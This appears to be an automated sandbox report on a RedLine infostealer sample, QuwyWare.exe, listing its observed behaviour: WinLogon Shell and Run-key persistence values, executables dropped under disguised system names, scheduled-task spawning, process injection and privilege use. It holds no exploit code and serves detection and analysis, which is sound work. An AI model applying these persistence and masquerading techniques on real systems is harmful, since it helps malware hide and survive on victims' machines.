Malware Analysis Report

2025-01-22 09:21

Sample ID 240706-vqn4lawejn
Target QuwyWare.exe
SHA256 2f87c0abee258364d03ca8fd669dce8dd71f8d30cd568543e9cb90d1f68348fd
Tags
redline sabad0n execution infostealer persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2f87c0abee258364d03ca8fd669dce8dd71f8d30cd568543e9cb90d1f68348fd

Threat Level: Known bad

The file QuwyWare.exe was found to be: Known bad.

Malicious Activity Summary

redline sabad0n execution infostealer persistence

RedLine

RedLine payload

Modifies WinLogon for persistence

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Runs ping.exe

Modifies registry class

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-06 17:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-06 17:11

Reported

2024-07-06 17:14

Platform

win10v2004-20240508-en

Max time kernel

60s

Max time network

65s

Command Line

"C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\", \"C:\\comServerRefcrtNet\\TextInputHost.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\", \"C:\\comServerRefcrtNet\\TextInputHost.exe\", \"C:\\Program Files\\Windows Media Player\\ja-JP\\smss.exe\", \"C:\\comServerRefcrtNet\\powershell.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\", \"C:\\comServerRefcrtNet\\TextInputHost.exe\", \"C:\\Program Files\\Windows Media Player\\ja-JP\\smss.exe\", \"C:\\comServerRefcrtNet\\powershell.exe\", \"C:\\Program Files (x86)\\Google\\CrashReports\\WmiPrvSE.exe\", \"C:\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\explorer.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\", \"C:\\comServerRefcrtNet\\TextInputHost.exe\", \"C:\\Program Files\\Windows Media Player\\ja-JP\\smss.exe\", \"C:\\comServerRefcrtNet\\powershell.exe\", \"C:\\Program Files (x86)\\Google\\CrashReports\\WmiPrvSE.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\comServerRefcrtNet\\unsecapp.exe\", \"C:\\Program Files\\MSBuild\\powershell.exe\", \"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\", \"C:\\comServerRefcrtNet\\TextInputHost.exe\", \"C:\\Program Files\\Windows Media Player\\ja-JP\\smss.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\comServerRefcrtNet\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\hwid.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\SoftwareDistribution\\Download\\RuntimeBroker.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\explorer.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\explorer.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Recovery\\WindowsRE\\cmd.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files\\MSBuild\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\comServerRefcrtNet\\TextInputHost.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Windows Media Player\\ja-JP\\smss.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Recovery\\WindowsRE\\SearchApp.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\comServerRefcrtNet\\TextInputHost.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\comServerRefcrtNet\\unsecapp.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\comServerRefcrtNet\\unsecapp.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files\\MSBuild\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Windows Media Player\\ja-JP\\smss.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\comServerRefcrtNet\\powershell.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\comServerRefcrtNet\\powershell.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Recovery\\WindowsRE\\SearchApp.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Recovery\\WindowsRE\\cmd.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Program Files (x86)\\Google\\CrashReports\\WmiPrvSE.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Program Files (x86)\\Google\\CrashReports\\WmiPrvSE.exe\"" C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSC284368D78044F41BA30132654ADC74A.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\rpvymf.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1988 set thread context of 4736 N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Google\CrashReports\WmiPrvSE.exe C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
File created C:\Program Files (x86)\Google\CrashReports\24dbde2999530e C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
File created \??\c:\Program Files\MSBuild\CSCA9C160C1AA0842E0AAA271B7FBC3FCF.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\MSBuild\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\MSBuild\powershell.exe C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Program Files\MSBuild\e978f868350d50 C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Program Files\Windows Media Player\ja-JP\69ddcba757bf72 C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
File created C:\Program Files\ModifiableWindowsApps\Idle.exe C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
File created C:\Program Files\Windows Media Player\ja-JP\smss.exe C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Windows\SoftwareDistribution\Download\9e8d7a4ca61bd9 C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Windows\Resources\Themes\aero\Shell\NormalColor\explorer.exe C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
File created C:\Windows\Resources\Themes\aero\Shell\NormalColor\7a0fd90576e088 C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
File created \??\c:\Windows\SoftwareDistribution\Download\CSC843AFAE444044DF9A627B2B89B543F.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\hwid.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\comServerRefcrtNet\ComsurrogateHost.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
